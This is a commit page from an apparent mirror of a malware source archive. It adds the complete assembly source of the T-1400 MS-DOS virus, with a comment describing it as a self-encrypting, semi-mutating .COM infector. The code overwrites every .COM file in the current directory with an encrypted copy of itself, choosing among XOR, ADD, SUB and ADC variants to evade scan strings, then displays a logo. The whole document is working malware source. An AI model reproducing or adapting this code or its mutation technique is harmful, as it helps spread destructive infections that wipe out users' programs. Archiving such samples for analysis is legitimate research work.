daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-16 15:59:24 +00:00
Code Issues Projects Releases Wiki Activity

Add files via upload

Browse Source
This commit is contained in:
vxunderground
2021-01-12 18:01:59 -06:00
committed by GitHub
parent 5dd4938a52
commit 3e7d2e8262
99 changed files with 45150 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
MSDOS/Virus.MSDOS.Unknown.t-1400.asm
+143
View File
@@ -0,0 +1,143 @@
;
; T-1400 Virus
;
; This is a non-resident overwriting self-encrypting semi-mutating .COM file
; infector. When an infected program is run, the virus will infect all the
; file in the current directory and displays a TridenT logo when finished with
; infecting. This is a bit more advanced virus than "T-1300" and a wildcard
; scanstring is needed to find this virus. It now utilizes three types of
; encryption, instead of only the XOR loop. it now utilizes ADD, ADC, SUB and
; SBB. the increment SI has now a new
; possibility, CMPSB.
;
Beg:
Mov Cx,MainLen
Length Equ $-2
S_1: Lea Si,Main
Zaken: Clc
Decrypt: Xor B [Si],0
CryptByte Equ $-1
S_2 Equ $-2
S_3: Inc Si
S_4: Loop Zaken
CryptLen Equ $-Beg
Main: Mov Ah,4eh
SeekNext: Lea Dx,FileSpec
Xor Cx,Cx
Int 21h
Jnc Yup
Jmp Einde
Yup: Mov Ax,3d02h
Mov Dx,09eh
Int 21h
Xchg Ax,Bx
Mov Ds,Cx
Inc Cx
Mov Ax,W Ds:[46ch]
Mov Ds,Cs
Mov B CryptByte,Ah
Mov B Zaken,0f8h
Mov B What,1
Mov B S_2,34h
Test Al,1
Jne NotXor
Test Al,32
Jne Done
Xor B Zaken,1
Jmp Done
NotXor: Mov B What,2
Mov B S_2,04h
Test Al,2
Je Done
Test Al,4
Je ItsAdc
Mov B What,3
Mov B S_2,2ch
Test Al,8
Je Done
Sub B S_2,20h
ItsAdc: Add B S_2,10h
Done: Mov B S_1,0beh
Cmp Ah,80h
Ja NoCMPSB
Mov B S_3,0A6h
Jmp Next
NoCMPSB: Mov B S_3,46h
Next: Test Ah,1
Jne NoReg
Xor B S_1,Cl
Xor B S_2,Cl
Cmp Ah,80h
Jbe NoReg
Xor B S_3,Cl
NoReg: Test Ah,2
Jne NoXor
Xor B Decrypt,2
NoXor: Test Ah,4
Jne NoLoop
Xor B S_4,2
NoLoop: Test Ah,8
Jne Ok
Mov B S_4,0E2h
Ok: Lea Si,Main
Lea Di,CryptPart
Mov Cx,MainLen
Push Cx
CodeIt: Lodsb
Cmp B What,1
Jne NeXor
Xor Al,Ah
Jmp Stor
NeXor: Cmp B What,2
Jne NeSub
Sub Al,Ah
Jmp Stor
NeSub: Add Al,Ah
Stor: Stosb
Loop CodeIt
Pop Cx
And Ax,03fffh
Add Cx,Ax
Mov W Length,Cx
Mov Ah,40h
Lea Dx,Beg
Mov Cx,CryptLen
Int 21h
Mov Ah,40h
Lea Dx,CryptPart
Mov Cx,MainLen
Int 21h
Mov Ah,3eh
Int 21h
Mov Ah,4fh
Jmp SeekNext
What Db 0
Einde:
Mov Al,3
Int 10h
Lea Si,Y
R: Lodsb
Mov Cl,8
C: Rol Al,1
Push Ax
Mov Al,32
If C Mov Al,219
Int 29h
Int 29h
Pop Ax
Loop C
Cmp Si,E
Jne R
Ret
Y: db 125,231,121,244,95,17,18,69,6,68,17,226,69,197,68,17,18,69,4,196,17,23,121,244,68
E:
FileSpec Db '*.COM',0
Msg Db 'T-1400'
MainLen Equ $-Main
CryptPart Equ $